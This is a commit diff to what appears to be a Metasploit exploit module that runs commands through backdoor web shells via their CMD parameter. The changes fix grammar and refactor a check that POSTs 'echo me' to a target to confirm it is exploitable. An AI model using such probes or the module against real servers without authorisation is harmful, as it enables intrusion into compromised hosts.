Update simple_backdoors_exec.rb

rapid7 · Sep 8, 2015 · 467f9a8 · 467f9a8
1 parent 37c28dd
commit 467f9a8
Showing 1 changed file with 8 additions and 9 deletions.
diff --git a/modules/exploits/multi/http/simple_backdoors_exec.rb b/modules/exploits/multi/http/simple_backdoors_exec.rb
@@ -15,9 +15,9 @@ def initialize(info={})
       'Name'           => 'Simple Backdoor Shell Remote Code Execution',
       'Description'    => %q{
           This module exploits unauthenticated simple web backdoor shells by leveraging the
-        common backdoor shells' CMD parameter  to execute commands. The SecLists project of
-        Daniel Miessler and Jason Haddix has a lot of samples for these kind of backdoor shells
-        which are categorized under Payloads.
+        common backdoor shell's CMD parameter  to execute commands. The SecLists project of
+        Daniel Miessler and Jason Haddix has a lot of samples for this kind of backdoor shells
+        which is categorized under Payloads.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -58,15 +58,14 @@ def initialize(info={})
 
   def check
     test = "echo me"
-    request_parameters = {
-      'method'	=> 'POST',
-      'uri'		=> normalize_uri(target_uri.path.to_s),
-      'vars_post'	=>
+    shell = send_request_cgi({
+      'method'  => 'POST',
+      'uri'             => normalize_uri(target_uri.path.to_s),
+      'vars_post'       =>
         {
           'cmd' => test
         }
-    }
-    shell = send_request_cgi(request_parameters)
+    })
     if (shell and shell.body =~ /echo me/)
       return Exploit::CheckCode::Vulnerable
     end